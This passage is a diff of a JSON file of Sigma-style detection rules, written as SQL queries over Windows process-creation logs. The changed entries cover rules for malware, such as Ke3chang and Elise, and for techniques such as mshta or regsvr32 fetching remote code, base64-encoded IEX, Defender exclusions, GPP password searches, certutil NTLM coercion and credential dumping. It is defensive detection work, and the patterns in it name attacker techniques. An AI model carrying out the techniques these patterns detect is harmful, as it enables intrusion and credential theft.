wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Ie4uinit Lolbin Use From Invalid Path", + "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "status": "experimental", + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", + "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1059.005", - "attack.t1059.001", "attack.t1218" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_lolbin_ie4uinit.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote Access Tool - NetSupport Execution", + "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport.yml" }, { - "title": "Suspicious Recursive Takeown", - "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "title": "Suspicious X509Enrollment - Process Creation", + "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", "status": "experimental", - "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "description": "Detect use of X509Enrollment", "author": "frack113", + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_x509enrollment.yml" + }, + { + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "status": "experimental", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1218" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_takeown_recursive_own.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Certificate Exported Via Certutil.EXE", - "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", "status": "test", - "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.g0004", "attack.defense_evasion", - "attack.t1027" + "attack.t1562.001" ], "falsepositives": [ - "There legitimate reasons to export certificates. Investigate the activity to determine if it's benign" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_export_pfx.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", - "author": "frack113", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", - "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.g0030", + "attack.g0050", + "attack.s0081", "attack.execution", - "attack.t1218.005" + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "Start of NT Virtual DOS Machine", - "id": "16905e21-66ee-42fe-b256-1318ada2d770", - "status": "experimental", - "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", - "author": "frack113", + "title": "Sysmon Configuration Update", + "id": "87911521-7098-470b-a459-9a57fc80bdfd", + "status": "test", + "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use" + "Legitimate administrators might use this command to update Sysmon configuration." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_16bit_application.yml" + "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1562.001" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + ], + "filename": "proc_creation_win_hktl_safetykatz.yml" + }, + { + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Launch-VsDevShell.PS1 Proxy Execution", - "id": "45d3a03d-f441-458c-8883-df101a3bb146", + "title": "JSC Convert Javascript To Executable", + "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", "status": "experimental", - "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1216.001" + "attack.t1127" ], "falsepositives": [ - "Legitimate usage of the script by a developer" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" + "filename": "proc_creation_win_lolbin_jsc.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", - "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", + "status": "test", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Execute Code with Pester.bat as Parent", - "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", "status": "experimental", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1216" + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Legitimate use by administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pester.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "Powershell Defender Exclusion", - "id": "17769c90-230e-488b-a463-e05c08e9d48f", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "status": "experimental", - "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.010" ], "falsepositives": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" + "FQDNs that start with a number" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_defender_exclusion.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Outlook 